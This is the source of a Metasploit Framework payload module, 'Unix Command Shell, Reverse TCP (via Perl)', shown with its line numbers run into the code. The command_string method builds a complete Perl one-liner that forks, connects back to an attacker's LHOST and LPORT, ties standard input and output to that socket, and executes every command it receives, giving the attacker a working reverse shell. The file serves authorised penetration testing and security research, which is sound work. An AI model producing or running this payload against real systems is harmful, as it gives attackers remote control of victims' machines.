Path: blob/master/modules/payloads/singles/cmd/unix/reverse_perl.rb
19592 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 23478include Msf::Payload::Single9include Msf::Sessions::CommandShellOptions1011def initialize(info = {})12super(13merge_info(14info,15'Name' => 'Unix Command Shell, Reverse TCP (via Perl)',16'Description' => 'Creates an interactive shell via perl',17'Author' => 'cazz',18'License' => BSD_LICENSE,19'Platform' => 'unix',20'Arch' => ARCH_CMD,21'Handler' => Msf::Handler::ReverseTcp,22'Session' => Msf::Sessions::CommandShell,23'PayloadType' => 'cmd',24'RequiredCmd' => 'perl',25'Payload' => {26'Offsets' => {},27'Payload' => ''28}29)30)31register_advanced_options(32[33OptString.new('PerlPath', [true, 'The path to the Perl executable', 'perl'])34]35)36end3738#39# Constructs the payload40#41def generate(_opts = {})42vprint_good(command_string)43return super + command_string44end4546#47# Returns the command string to use for execution48#49def command_string50ver = Rex::Socket.is_ipv6?(datastore['LHOST']) ? '6' : ''51lhost = Rex::Socket.is_ipv6?(datastore['LHOST']) ? "[#{datastore['LHOST']}]" : datastore['LHOST']52"#{datastore['PerlPath']} -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"53end54end555657